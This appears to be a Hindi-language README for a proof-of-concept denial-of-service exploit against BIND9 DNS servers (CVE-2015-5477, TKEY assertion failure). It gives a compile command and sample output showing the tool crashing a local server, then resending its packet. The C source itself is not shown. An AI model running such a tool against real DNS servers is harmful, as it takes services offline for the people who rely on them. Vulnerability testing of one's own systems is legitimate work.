
CVE-2015-5477 BIND9 TKEY assertion failure के लिए PoC एक्सप्लॉइट
यह एक्सप्लॉइट यह जांचता है कि BIND9 सर्वर असुरक्षित है या नहीं, एक्सप्लॉइट भेजकर देखता है कि सर्वर क्रैश होता है या नहीं।
यह C कोड है जिसे आप Unix/Window पर सामान्य तरीके से कंपाइल कर सकते हैं, जैसे:
# gcc tkill.c -o tkill
यह IPv4 और IPv6 दोनों पर चलेगा।
यह localhost के विरुद्ध चलने पर ऐसा दिखता है। चूंकि यह नाम को हल करने पर दो IP पते प्राप्त करता है, यह दोनों का प्रयास करेगा।
यह पहले "version" स्ट्रिंग को क्वेरी करता है, फिर एक्सप्लॉइट भेजता है।
जब यह दूसरे पते की जांच करता है, तो version क्वेरी विफल हो जाती है क्योंकि सेवा पहले प्रयास में ही क्रैश हो चुकी होती है।
root@kali:~/cve-2015-5477# ./a.out localhost
--- PoC for CVE-2015-5477 BIND9 TKEY assert DoS ---
[+] localhost: Resolving to IP address
[+] localhost: Resolved to multiple IPs (NOTE)
[+] ::1: Probing...
[+] Querying version...
[+] ::1: "9.11.0pre-alpha"
[+] Sending DoS packet...
[+] Waiting 5-sec for response...
[+] timed out, probably crashed
[+] 127.0.0.1: Probing...
[+] Querying version...
[-] timed out getting version, trying again
[-] timed out getting version, trying again
[-] timed out getting version, trying again
[-] Can't query server, is it crashed already?
[-] Sending exploit anyway.
[+] Sending DoS packet...
[+] Waiting 5-sec for response...
[+] timed out, probably crashed